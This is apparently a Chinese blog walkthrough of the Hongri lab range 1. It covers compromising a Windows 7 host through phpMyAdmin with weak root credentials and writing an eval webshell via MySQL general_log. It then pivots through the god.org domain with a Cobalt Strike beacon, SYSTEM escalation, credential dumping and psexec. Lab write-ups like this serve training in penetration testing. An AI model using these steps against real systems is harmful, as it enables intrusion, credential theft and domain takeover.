内网渗透——红日靶场一总结

准备工作:

启动win7的phpstudy:

Win2k3和win2008均能成功访问:http://192.168.52.143

外网渗透:

信息收集

1、Kali利用nmap发现到win7的ip:

nmap -sP 192.168.114.0/24

 

2、扫描该ip的端口,发现了80端口和3306端口开放:

nmap -sS -sV -T5 -A -p- 192.168.114.129

3、访问:192.168.114.129:80,发现是一个phpstudy 2014的探针文件,通过php探针获取到了网站的绝对路径:C:/phpStudy/WWW

4、测试MySQL数据库连接,尝试利用弱口令进行连接(经过测试发现用户名和密码均是root):

5、利用dirb扫描目录:dirb http://192.168.114.129/

 

6、发现phpmyadmin,尝试访问,浏览器输入:http://192.168.114.129/phpmyadmin/

7、利用上述检测出的用户名和密码尝试登录(均为root),发现成功登录并得到了一些关键信息:

外网渗透

1、通过修改日志文件来GetSHELL

点击sql执行语句show variables  like  '%general%'; 查询日志信息:

2、打开general_log日志读写功能,SET GLOBAL general_log='on':

 

3、再次利用show variables  like  '%general%';语句查看成功打开了日志文件的读写功能

 

4、利用SQL语句创建文件:SET GLOBAL general_log_file='C:/phpStudy/WWW/shell.php'

再次查询show variables  like  '%general%';

5、因为日志文件会记录错误的SQL语句,这里尝试写入一串错误的语句:select '<?php phpinfo(); ?>'

浏览器访问对于网址:

6、尝试上传一句话木马 SELECT '<?php @eval($_POST[passwd]);?>'

7、打开蚁剑尝试连接

成功连接

8、打开虚拟终端发现,该主机有两个网卡,且存在域环境god.org

内网渗透

准备工作:

1、将cs工具包解压后放入kali中:

2、进入cobaltstrike4.0文件夹,运行./teamserver 192.168.114.128 654321 启动服务器:

 

3、再次运行命令行启动一个客户端:./start.sh :

 

 

4、输入密码654321.然后连接 

5、将CS的其他插件集成执行操作如下: 

 

 

添加插件后,发现其内网渗透工具明显增多

提权选项增多

 

开始进行内网渗透

利用CS工具生成木马:

1、在CS的监听模块中点击添加,点击保存

2、根据该模块生成木马,操作如下选择attacks,选择packages,选择第四项:

 

3、因为上述获取到被攻击者是64位,这里需要勾选X64,点击generate即可

4、生成在当前路径即可:

5、打开文件夹管理器即可查看到该exe文件

6、将其复制在物理机中,不要点击运行,利用蚁剑上传文件到被攻击者上即可

7、上传成功后,利用蚁剑工具进行执行该1.exe文件,通过CS工具发现已经成功感染目标主机

8、点击被感染主机,右键interact

9、由于这里设置了延时,先取消其延时时间;输入sleep 0 ,待41s走到60即可马上开始执行命令了

10、可通过shell + 命令名执行:如shell systeminfo

 

11、查询当前在线用户:shell query user || qwinsta

 

 12、进行提权操作:依次点击如下

 

13、这里成功获取到了一个系统权限的system用户

 

14、设置延时为0后,查看shell whoami

 

15、通过system的账户执行net view 查看域内共享文件

点击如下按钮能查看到内网的相关信息

点击如下按钮能查看到图形化界面:

16、利用system用户嗅探内存中的密码及其哈希值相关信息,对目标机进行端口扫描,操作如下:

17、扫描到了域中信息的明文密码

18、点击下面按钮能直接查看到嗅探到的相关信息(账号密码。域信息)

19、设置smb监听,操作顺序如下

注:这里第一次选择的是psexsc没有成功,第二次切换的psexec64进行测试,然后成功感染域中主机

20、配置如下信息:

21、选择system权限的用户(需要利用其当作跳板),点击launch

22、发现目标主机已经被感染即成功渗透:

23、打开其shell窗口

24、设置延时为0,然后输入shell  systeminfo查看信息

25、对于另外域中另外一台主机利用同样的方式进行测试(这里可以设置不同的域管理员账户信息尝试):

26、该域中另外一台主机也成功感染

27、可利用shell systeminfo获取相关信息

28、点击图示标红处,显示内网主机的相关情况

​​​​​​​

  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

BUFUMYSELF

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值